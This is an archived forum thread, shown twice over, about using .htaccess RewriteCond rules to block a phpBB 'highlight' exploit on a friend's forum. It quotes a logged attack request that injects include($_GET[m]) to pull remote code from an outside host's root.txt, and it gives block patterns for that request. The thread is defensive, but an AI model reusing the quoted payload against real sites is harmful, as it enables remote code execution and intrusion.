Topic awaiting preservation: .htaccess: String blocking (Page 1 of 1) $Pages that link to <a href="https://ozoneasylum.com/backlink?for=26751" title="Pages that link to Topic awaiting preservation: .htaccess: String blocking (Page 1 of 1)" rel="nofollow" >Topic awaiting preservation: .htaccess: String blocking <span class="small">(Page 1 of 1)</span>\$

DaveFA Bipolar (III) Inmate From: USA Insane since: Feb 2004	posted 09-29-2005 17:00 My friend has a fully patched phpBB, but it has over 2000 members, and is easily found via a google search. He tends to get hit with every exploit, and I wanted to help him start filtering some common exploits out via his .htaccess file. The latest URI string that's being posted is: code: GET viewtopic.php?t=4377&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://www.argaio.net/root.txt?& HTTP/1.0" 403 - The basic fix posted on phpBB.com's support forum is to add code: RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR] to the .htaccess, but I'd like to go a step further. Since a number of recent exploits are using different servers (other than argaio.net) in the URL, but are all consistantly using "root.txt", I'd like to know if there's a way to block sites that have "root.txt" in their URI via the .htaccess. Thanks as always, guys. ----------------------------------- -Dave Maker of stuff, user of things -----------------------------------
hyperbole Paranoid (IV) Inmate From: Madison, Indiana, USA Insane since: Aug 2000	posted 09-29-2005 19:17 I'm a little fuzzy on what you're trying to do. I understand that you have phpBB and you want to try to block access to the BB by filtering out requests from certain URIs. If you are already filtering URIs based on the above QUERY_STRING, just add another RewriteCond and change the pattern to root.txt code: RewriteCond %{QUERY_STRING} highlight=\%2527 [OR] RewriteCond %{QUERY_STRING} root.txt [OR] The [OR] at the end of the line should cause it to match either string. Note: I changed the pattern you're using in the first Rewrite Cond statement. The '^(.*)' wasn't necessary to match the string. This seems to me to be a rather fruitless way to stop attacks. All the attackers have to do is change the string in the query and they will be able to get into your system again. You certainly don't want to try to block every possible URI an attacker could use. Have you considered only allowing access to the site for those IPs or URIs that are registered? You might want to try searching the net for some better ways to protect your site from attacks. . -- not necessarily stoned... just beautiful.
DaveFA Bipolar (III) Inmate From: USA Insane since: Feb 2004	posted 09-29-2005 19:37 Unfortunately, it's not my site. I use multiple techniques for blocking attackers, including IP/Spam Domain blocking, layered authentication, etc. This is just to help out a pal who runs a sports site and has no idea about, well, anything except sports. ----------------------------------- -Dave Maker of stuff, user of things -----------------------------------

Topic awaiting preservation: .htaccess: String blocking (Page 1 of 1) $Pages that link to <a href="https://ozoneasylum.com/backlink?for=26751" title="Pages that link to Topic awaiting preservation: .htaccess: String blocking (Page 1 of 1)" rel="nofollow" >Topic awaiting preservation: .htaccess: String blocking <span class="small">(Page 1 of 1)</span>\$

DaveFA
Bipolar (III) Inmate

From: USA
Insane since: Feb 2004

posted 09-29-2005 17:00

My friend has a fully patched phpBB, but it has over 2000 members, and is easily found via a google search. He tends to get hit with every exploit, and I wanted to help him start filtering some common exploits out via his .htaccess file.

The latest URI string that's being posted is:

code:

GET viewtopic.php?t=4377&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://www.argaio.net/root.txt?& HTTP/1.0" 403 -

The basic fix posted on phpBB.com's support forum is to add

code:

RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]

to the .htaccess, but I'd like to go a step further.

Since a number of recent exploits are using different servers (other than argaio.net) in the URL, but are all consistantly using "root.txt", I'd like to know if there's a way to block sites that have "root.txt" in their URI via the .htaccess.

Thanks as always, guys.

-----------------------------------
-Dave

Maker of stuff, user of things
-----------------------------------

hyperbole
Paranoid (IV) Inmate

From: Madison, Indiana, USA
Insane since: Aug 2000

posted 09-29-2005 19:17

I'm a little fuzzy on what you're trying to do. I understand that you have phpBB and you want to try to block access to the BB by filtering out requests from certain URIs.

If you are already filtering URIs based on the above QUERY_STRING, just add another RewriteCond and change the pattern to root.txt

code:

RewriteCond %{QUERY_STRING} highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} root.txt [OR]

The [OR] at the end of the line should cause it to match either string.

Note: I changed the pattern you're using in the first Rewrite Cond statement. The '^(.*)' wasn't necessary to match the string.

This seems to me to be a rather fruitless way to stop attacks. All the attackers have to do is change the string in the query and they will be able to get into your system again. You certainly don't want to try to block every possible URI an attacker could use.

Have you considered only allowing access to the site for those IPs or URIs that are registered? You might want to try searching the net for some better ways to protect your site from attacks.

.

-- not necessarily stoned... just beautiful.

DaveFA
Bipolar (III) Inmate

From: USA
Insane since: Feb 2004

posted 09-29-2005 19:37

Unfortunately, it's not my site. I use multiple techniques for blocking attackers, including IP/Spam Domain blocking, layered authentication, etc. This is just to help out a pal who runs a sports site and has no idea about, well, anything except sports.

-----------------------------------
-Dave

Maker of stuff, user of things
-----------------------------------